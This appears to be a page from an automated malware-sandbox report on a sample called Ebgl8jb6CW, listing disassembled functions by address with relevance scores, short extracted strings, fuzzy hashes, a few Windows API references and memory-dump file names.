Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: )$+$>$@$F$L$[$`
API String ID: 0-4163809010
Opcode ID: afea7f13e090e8c60fc4113b6c8d90c18b59e81b65d326c6cd5d97339cbe6742
Instruction ID: db5a84260db19d7c8de8dbf5e8228e9e31fa451a49cfead950717e9e61fd57ac
Opcode Fuzzy Hash: afea7f13e090e8c60fc4113b6c8d90c18b59e81b65d326c6cd5d97339cbe6742
Instruction Fuzzy Hash: 8452817260C7809BD324AB38C5953AEBBE5AB95320F198A2DE4D9C73C1E77489458B43

Function 00337366 Relevance: 12.9, Strings: 9, Instructions: 1629COMMON

Download Yara Rule

Strings

L7o, xrefs: 00337C13
WG6?, xrefs: 00337EE0
ro/|, xrefs: 00338631
R4;;, xrefs: 00337C60
@/, xrefs: 003386B9
3KV, xrefs: 0033754D
Q?+, xrefs: 00337773
jw, xrefs: 00338226
'z, xrefs: 00337622

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: 3KV$L7o$Q?+$R4;;$WG6?$ro/|$'z$@/$jw
API String ID: 0-3261073144
Opcode ID: ab26324f5b55cc0896d9316e40d365592973c10be3eb3579aa053a048c6dc78b
Instruction ID: 14f39dec050b3ed443e4383e17d23483cdf0356902a8374eda7a65d816e91fc0
Opcode Fuzzy Hash: ab26324f5b55cc0896d9316e40d365592973c10be3eb3579aa053a048c6dc78b
Instruction Fuzzy Hash: CAB227F3A0C2149FE3046E2DEC8567AFBE9EF94720F16493DEAC583744EA7558018792

Function 0033C424 Relevance: 12.9, Strings: 9, Instructions: 1606COMMON

Download Yara Rule

Strings

=x~?, xrefs: 0033C89A
q1, xrefs: 0033D46D
1:4m, xrefs: 0033C45C
Z~}7, xrefs: 0033CDF2
gMQc, xrefs: 0033CE70
iA]=, xrefs: 0033CE06
)]s, xrefs: 0033CEE9
f#[7, xrefs: 0033C571
iA]=, xrefs: 0033CD5D

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: q1$)]s$1:4m$=x~?$Z~}7$f#[7$gMQc$iA]=$iA]=
API String ID: 0-2663770465
Opcode ID: 5b92adc051e5f910764727de3ba90500aebd7af47455984257366653170ba66b
Instruction ID: 76efcb4064800e241fe592355cfd6df10e939af6616e2b0e2557f8620d3528ca
Opcode Fuzzy Hash: 5b92adc051e5f910764727de3ba90500aebd7af47455984257366653170ba66b
Instruction Fuzzy Hash: CBB227F36086049FE3046E29EC8567AFBE9EFD4720F1A853DEAC4C3744EA3558058693

Function 0018747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON

Download Yara Rule

Strings

_^]\, xrefs: 001875C5

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: 40535da91b0e86023bbaf967ee89b282812a1a28c2bd1a69e3fc2013506b0675
Instruction ID: ffbece19af8d0bf7e33fa654741183e99fe441b678d1d08e141ebebe0889de89
Opcode Fuzzy Hash: 40535da91b0e86023bbaf967ee89b282812a1a28c2bd1a69e3fc2013506b0675
Instruction Fuzzy Hash: 0D8236715083518BC724DF28C8917ABB7E2FFD9324F298A6CE8D5972A5E734C905CB42

Function 00179310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON

Download Yara Rule

Strings

PTvu, xrefs: 001796F3
cbrn, xrefs: 001793EE
;"I, xrefs: 0017944E
A, xrefs: 00179698
FM, xrefs: 00179370
WAg., xrefs: 0017943E
,6.2, xrefs: 00179446

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
API String ID: 0-3116088196
Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction ID: fbfb1d0d02216da9d71155387eda06ec9949da1bf63a1728733e60754ec36af1
Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction Fuzzy Hash: A4C1257160C3D54BD322CF6994A075BBFE19FD6210F088AADE4D91B382D365890ACB92

Function 001981CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001984BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001985B4

Strings

LF7Y, xrefs: 00198951
_^]\, xrefs: 00198A15

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: a0f26abf28f13870fae24d34436b4300625384f2b6f4a0c95e872f31cba96a57
Instruction ID: 796ac693d43f6fc5225835afc2d8094f824f1fd969b59d4d898d9d1026ee7f0a
Opcode Fuzzy Hash: a0f26abf28f13870fae24d34436b4300625384f2b6f4a0c95e872f31cba96a57
Instruction Fuzzy Hash: A922F171908341CFD7249F28D89072FBBE1FFCA310F194A6CE999972A1D7319945CB92

Function 001983D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001984BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001985B4

Strings

LF7Y, xrefs: 00198951
_^]\, xrefs: 00198A15

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: bbe9a04dfb6b74849382f1a2daa104aab5a2a092db1197d007aeced4cfb2e4bb
Instruction ID: b43a49fdbe9210d5de32ae988bfe350a2d9002483398d16578f465ee4eb93d23
Opcode Fuzzy Hash: bbe9a04dfb6b74849382f1a2daa104aab5a2a092db1197d007aeced4cfb2e4bb
Instruction Fuzzy Hash: 9112E171908341CFD7249F28D88076FBBE1BFCA310F1A4A6CE599972A1D731D945CB92

Function 0033046D Relevance: 6.6, Strings: 4, Instructions: 1637COMMON

Download Yara Rule

Strings

w~_, xrefs: 00330CBA
%xWm, xrefs: 00330FC6
R5', xrefs: 0033104F
Afo, xrefs: 00330561

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: %xWm$Afo$R5'$w~_
API String ID: 0-3939488229
Opcode ID: afbf94a29a9004449950ec035223c3dc513ca315ef2887aaabc2dac8af8c5299
Instruction ID: 35c26c36321932a452e7f6b33c96c1a557b03b3693c0bcb7a03083ce06fe22e4
Opcode Fuzzy Hash: afbf94a29a9004449950ec035223c3dc513ca315ef2887aaabc2dac8af8c5299
Instruction Fuzzy Hash: FBB218F360C2049FE304AE29EC8567AFBE5EFD4720F16893DEAC5C7744EA3558018696

Function 001924E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON

Download Yara Rule

Strings

=K0E, xrefs: 00192544
"_,Y, xrefs: 00192530
.[TU, xrefs: 00192538
pCj], xrefs: 00192528
;GsA, xrefs: 00192520

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
API String ID: 0-1171452581
Opcode ID: 36b145a2b7d9ea6a5d77186ba3c7c8b5bd420a210394fd9a5bbffa28eafb2746
Instruction ID: 677d5d4f02c41097c267a6a3620df1f265271ae28d5f0ae8c8d5d3d040022699
Opcode Fuzzy Hash: 36b145a2b7d9ea6a5d77186ba3c7c8b5bd420a210394fd9a5bbffa28eafb2746
Instruction Fuzzy Hash: 2B9147B1608300ABDB24DF64C891BA7B3F1EF95714F15842CF8899B382E374D906C752

Function 00188169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

2h?n, xrefs: 001883A0
^`/4, xrefs: 001881E1
gfff, xrefs: 00188458
7, xrefs: 00188419
SP, xrefs: 00188396

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: 0a0ab5a4bd11f412a2ac9fa4f76dc937872146a1bd44053fdfdd407080ac61c3
Instruction ID: 9feee77637dbe07d23ede65c854d2b6808bb0c295c2d54e45abbe52cab8bb308
Opcode Fuzzy Hash: 0a0ab5a4bd11f412a2ac9fa4f76dc937872146a1bd44053fdfdd407080ac61c3
Instruction Fuzzy Hash: F4A126B2A142508BD314DF28D85176FB7E2FBD4318F59CA2DD885D7291EB38C9428B81

Function 0032D2E0 Relevance: 6.2, Strings: 4, Instructions: 1172COMMON

Download Yara Rule

Strings

_#oY, xrefs: 0032DC1D
fft, xrefs: 0032D9B2
G/mW, xrefs: 0032D39C
~_, xrefs: 0032DCA7

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: G/mW$_#oY$fft$~_
API String ID: 0-3255928470
Opcode ID: c4f3f724388995546318e195f612a83b129acadea6091876b1e5df43ffffd4e2
Instruction ID: 1a9e2e64713db928868f702b83f45f4491d0769412df8bff392173d47c8cdd1e
Opcode Fuzzy Hash: c4f3f724388995546318e195f612a83b129acadea6091876b1e5df43ffffd4e2
Instruction Fuzzy Hash: 9282D5F29082009FE304AF29EC8566AFBE5EF94720F16892DE6C5C7344E63598458B97

Function 00191340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON

Download Yara Rule

Strings

sp, xrefs: 00191528
eb, xrefs: 001916F6
{s, xrefs: 00191520
9deZ, xrefs: 00191818

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID: 9deZ$eb$sp${s
API String ID: 0-3993331145
Opcode ID: 736cdc433f83456efb8b3c2a704ac9f2b3de760433541da166f714fbf486691a
Instruction ID: d410b0ba1b117dab824badbdab2c5d98ebf53d12e68b433eb089c70eb6a6e1a5
Opcode Fuzzy Hash: 736cdc433f83456efb8b3c2a704ac9f2b3de760433541da166f714fbf486691a
Instruction Fuzzy Hash: ECD116B16183059BCB28DF24C8A166BB7F2FFD1354F08CA1CE4968B3A0E7789944C742

Function 001991AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 001991DA

Strings

+Ku, xrefs: 001992AF
wpq, xrefs: 001992B7

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$wpq
API String ID: 237503144-1953850642
Opcode ID: 0f28c6d7d94ea8f4d46bdce0e934422cee3789ffcd80d5e45c4d5c299633fda1
Instruction ID: 7f2f24655d796a4a2d8d5e7cf486b0e73bcac2387ae0a934c161970bd59d02ed
Opcode Fuzzy Hash: 0f28c6d7d94ea8f4d46bdce0e934422cee3789ffcd80d5e45c4d5c299633fda1
Instruction Fuzzy Hash: 0D51AC7221C3528FC724CF69984076FB7F6EBC5310F55892DE4AACB285DB70D50A8B92

Function 001990D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00199170

Strings

M/(, xrefs: 0019913D
M/(, xrefs: 0019919E

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
